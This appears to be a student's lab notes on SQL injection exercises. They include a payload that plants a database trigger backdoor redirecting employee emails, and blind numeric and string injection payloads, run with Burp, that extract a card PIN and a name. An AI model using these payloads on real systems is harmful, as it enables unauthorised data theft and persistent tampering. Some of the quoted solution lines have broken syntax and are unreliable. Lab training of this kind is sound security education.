Database BackDoors
101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='nastique21@yahoo.co.uk'WHERE userid = NEW.userid

Blind Numeric SQL injection - The class video had no sound but i recall the exercise was around guessing the correct pin & after how many tries.
I found a solution online to use Burp
Using the syntax shared in class, I used payload with values greater than 2000
101 and ((select pin from pins where cc_number=1111222233334444) >2000)
Used Burp for doing a sniper attack. Please find png attached.- Blind Numeric Sql Injection.png
Correct Pin is 2364

Blind String SQL Injection
101 and (SUBSTRING ((select name from pins where cc_number='4321432143214321'), 1, 1)< 'Z' )
Anything greater than A but less than Z returns a valid account number
I used payload of letters A to Z & a to z
The name is Jill


Class Solution was 
101 and (SUBSTRING ((select name from pins where cc_number='4321432143214321'), 1, 1)< 'Z' )
101 and (SUBSTRING ((select name from pins where cc_number='4321432143214321') >'a')- Invalid
101 and (SUBSTRING ((select name from pins where cc_number='4321432143214321') >'Jf')- Valid
101 and (SUBSTRING ((select name from pins where cc_number='4321432143214321') >'Jill')- Valid



